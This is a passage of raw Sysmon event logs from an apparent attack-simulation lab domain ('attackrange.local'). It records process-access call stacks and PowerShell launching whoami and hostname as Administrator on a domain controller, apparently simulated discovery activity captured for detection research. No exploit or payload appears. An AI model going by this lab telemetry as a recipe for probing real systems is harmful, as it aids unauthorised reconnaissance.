indows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032733Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.241{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032732Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.241{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032731Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.241{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032730Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.241{FF16AF91-26BA-6013-2300-00000000A401}28122828C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-6C03-00000000A401}6444C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032729Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.241{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36E1-6013-6C03-00000000A401}6444C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5f0632a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e522e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e50635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4f82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5043b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64) 154100x800000000000000032728Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.250{FF16AF91-36E1-6013-6C03-00000000A401}6444C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000032727Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.225{FF16AF91-26EB-6013-9700-00000000A401}57963100C:\Windows\system32\conhost.exe{FF16AF91-36E1-6013-6B03-00000000A401}2732C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032726Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.225{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032725Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.225{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032724Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.225{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032723Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.225{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032722Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.225{FF16AF91-26BA-6013-2300-00000000A401}28122960C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-6B03-00000000A401}2732C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032721Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.225{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36E1-6013-6B03-00000000A401}2732C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5f0632a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e522e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e50635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4f82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5043b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64) 154100x800000000000000032720Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.235{FF16AF91-36E1-6013-6B03-00000000A401}2732C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000361079Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361078Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361077Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+374d7|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361076Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37271|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361075Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-337b-6013-8402-000000001100}165610244C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+1dbfa|C:\Windows\System32\NPSMDesktopProvider.dll+139e2|C:\Windows\System32\NPSMDesktopProvider.dll+1415b|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361074Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-337b-6013-8402-000000001100}16562912C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+9685f|C:\Windows\System32\TaskFlowDataEngine.dll+96359|C:\Windows\System32\TaskFlowDataEngine.dll+95d85|C:\Windows\System32\TaskFlowDataEngine.dll+93be5|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361073Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361072Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 